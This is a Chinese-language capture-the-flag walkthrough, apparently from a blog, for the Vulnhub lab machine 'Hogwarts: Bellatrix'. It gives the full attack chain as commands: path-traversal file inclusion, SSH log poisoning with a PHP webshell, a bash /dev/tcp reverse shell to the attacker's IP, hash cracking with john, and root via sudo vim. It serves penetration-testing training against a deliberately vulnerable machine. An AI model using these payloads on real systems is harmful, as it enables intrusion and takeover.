Vulnhub: Hogwarts: Bellatrix靶机

kali:192.168.111.111

靶机:192.168.111.228

信息收集

端口扫描

复制代码
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.228

访问80端口

查看源码,提示ikilledsiriusblack.php和文件包含的参数名file

漏洞利用

ikilledsiriusblack.php存在文件包含

复制代码
http://192.168.111.228/ikilledsiriusblack.php?file=../../../../../../../../../../../../etc/passwd

可以包含ssh日志文件/var/log/auth.log

复制代码
http://192.168.111.228/ikilledsiriusblack.php?file=../../../../../../../../../../../../var/log/auth.log

写入webshell到ssh日志文件

复制代码
ssh '<?php system($_GET["cmd"]);?>'@192.168.111.228

执行命令

复制代码
http://192.168.111.228/ikilledsiriusblack.php?file=../../../../../../../../../../../../var/log/auth.log&cmd=id

执行反弹shell

复制代码
bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'

提权

/var/www/html/c2VjcmV0cw==目录中发现密码字典和lestrange的密码密文

利用john爆破密文,密码:ihateharrypotter

复制代码
john hash --wordlist=./pass.txt

lestrange用户sudo权限

提权方法:https://gtfobins.github.io/gtfobins/vim/#sudo

提升为root

复制代码
sudo -u root vim -c ':!/bin/bash'

flag

相关推荐
白帽子黑客罗哥35 分钟前
零基础转行渗透测试 系统的学习流程(非常详细)
学习·网络安全·渗透测试·漏洞挖掘·护网行动
介一安全38 分钟前
【Frida Android】实战篇13:企业常用非对称加密场景 Hook 教程
android·网络安全·逆向·安全性测试·frida
Suckerbin1 小时前
Gaara: 1靶场渗透
安全·web安全·网络安全
Oxo Security2 小时前
【AI安全】拆解 OWASP LLM Top 10 攻击架构图
人工智能·安全
GIS数据转换器2 小时前
2025无人机遥感新国标解读
大数据·科技·安全·机器学习·无人机·智慧城市
小白勇闯网安圈3 小时前
Training-WWW-Robots、command_execution、baby_web、xff_referer
网络安全·web
深盾科技4 小时前
XCFramework 全景小抄:从多架构打包到安全加固的极简路线
安全
小白勇闯网安圈5 小时前
unserialize3、php_rce、Web_php_include、warmup、NewsCenter
sql·网络安全·web
是喵斯特ya5 小时前
phpstudy+安全狗搭建安全靶场
安全·web安全
疯狂的维修5 小时前
关于WANCE_SG系列光栅和安全继电器的原理解析
安全